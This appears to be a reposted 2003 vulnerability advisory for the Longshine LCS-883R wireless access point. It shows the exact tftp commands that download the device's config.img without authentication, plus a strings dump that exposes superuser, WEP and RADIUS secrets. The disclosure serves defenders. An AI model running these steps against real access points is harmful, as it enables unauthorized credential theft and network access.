Users login

Create an account »


Users login

Home » Hacking News » Longshine WLAN Access-Point LCS-883R VU#310201

Longshine WLAN Access-Point LCS-883R VU#310201

by Nikola Strahija on January 8th, 2003 Description: Get Superuser Privileges and view the devices password and password and other passwords

Versions affected: tested with 03.01.0b and 03.01.0h

Vendor contacted: e-mailed Longshine at Sun Dec 29

Details: You are able to connect via tftp to the access-point an you can get download the configuration
without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
In this configuration in the Username of the Superuser and the corresponding password stored.
The WEP Secret for the encryption and the password from your radius server is also readable.
This "attack" works via WLAN (!!!) and Ethernet.

tftp> connect
tftp> get config.img
Received 780 bytes in 1.0 seconds
tftp> quit

[~]/->strings config.img
DNXLABAP01 <- name of the AP
root <- name of the superuser
XXXXXX123 <- password from superuser
secu9 <- secret for WEP
7890abcdef <-

You are also able to get the following files:


Solution: after contact with the vendor he claims that a new firmware-upgrade
fixes this problem, but the latest available firmware on his web-page
dosn't fix it anyway.


LONGSHINE Technologie (Europe) GmbH

An der Strusbek 9
D-22926 Ahrensburg

Tel: ++ 49 ( 0 ) 4102 / 4922- 0
Fax: ++ 49 ( 0 ) 4102 / 40109

[email protected]
Lukas Grunwald aka REG lg1

DN-Systems Enterprise Internet Solutions GmbH

Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.


Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »